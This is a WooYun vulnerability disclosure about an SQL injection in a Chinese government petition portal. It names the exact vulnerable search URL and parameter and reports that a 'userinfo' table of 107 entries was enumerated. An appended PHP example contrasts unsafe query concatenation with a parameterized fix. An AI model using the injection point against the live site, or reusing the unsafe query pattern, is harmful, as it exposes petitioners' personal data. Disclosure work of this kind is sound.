Vulnerability summary

Defect ID: wooyun-2014-056623

Title: SQL injection vulnerability in the Nanchong petition (xinfang) portal

Affected vendor: Nanchong petition portal (南充信访门户网)

Reporter: bitcoin

Submitted: 2014-04-11 10:56

Fix deadline: 2014-05-26 10:57

Published: 2014-05-26 10:57

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2014-04-11: Details sent to the vendor; awaiting vendor handling
2014-04-16: Vendor confirmed; details disclosed to the vendor only
2014-04-26: Details disclosed to core white hats and experts in the relevant field
2014-05-06: Details disclosed to regular white hats
2014-05-16: Details disclosed to intern white hats
2014-05-26: Details disclosed to the public

Brief description:

The Nanchong petition portal has an SQL injection vulnerability.

Detailed description:

Injection point:
http://www.ncxf.gov.cn/search.php?do=search&s=ww&select=%E5%85%A8%E6%96%87%E6%A3%80%E7%B4%A2&imageField.x=24&imageField.y=10
The parameter s is insufficiently filtered, which allows SQL injection.

[Screenshot: 1.jpg]


Database: ncxf
[152 tables]

[Screenshot: 3.jpg]


Database: ncxf
Table: userinfo
[107 entries]

Proof of vulnerability:

Database: ncxf
Table: userinfo
[107 entries]

Fix:

Filter the input.

Copyright notice: please credit the source when republishing: bitcoin@WooYun
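To make the recommended fix concrete, the following is an added example (not code from the report or from the affected site): a hypothetical `search.php` handler showing the unsafe pattern behind an unfiltered `s` parameter next to a parameterized version that also whitelists the `select` mode. The table, column names, mode labels and database credentials are all assumptions.

```php
<?php
// Added example: hypothetical search.php handler. Table/column names, mode
// labels and credentials are assumed, not taken from the real site.
declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=ncxf;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
]);

// UNSAFE (the pattern the report describes): the value of ?s= is spliced into
// the SQL text, so quotes and SQL keywords inside it are parsed by the database.
function searchUnsafe(PDO $pdo, string $s): array
{
    $sql = "SELECT id, title FROM article WHERE content LIKE '%" . $s . "%'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// SAFE: the statement text is fixed; user data travels as a bound parameter and
// cannot change the statement's structure. LIKE wildcards are escaped so a
// user-supplied '%' or '_' matches literally (MySQL's default escape is '\').
function searchSafe(PDO $pdo, string $s, string $mode): array
{
    // Whitelist the column selector (the 'select' parameter); never interpolate it.
    $columns = ['全文检索' => 'content', '标题' => 'title'];   // assumed mode labels
    $column  = $columns[$mode] ?? 'content';

    $pattern = '%' . addcslashes($s, '%_\\') . '%';
    $stmt = $pdo->prepare("SELECT id, title FROM article WHERE {$column} LIKE ?");
    $stmt->execute([$pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

if (($_GET['do'] ?? '') === 'search') {
    // Bound the length as well; the DB driver handles quoting.
    $s    = mb_substr((string)($_GET['s'] ?? ''), 0, 100);
    $rows = searchSafe($pdo, $s, (string)($_GET['select'] ?? ''));
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode($rows, JSON_UNESCAPED_UNICODE);
}
```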


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2014-04-16 09:31

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Sichuan branch for handling. It involves a risk of information disclosure. Rank 15.

Latest status:

None yet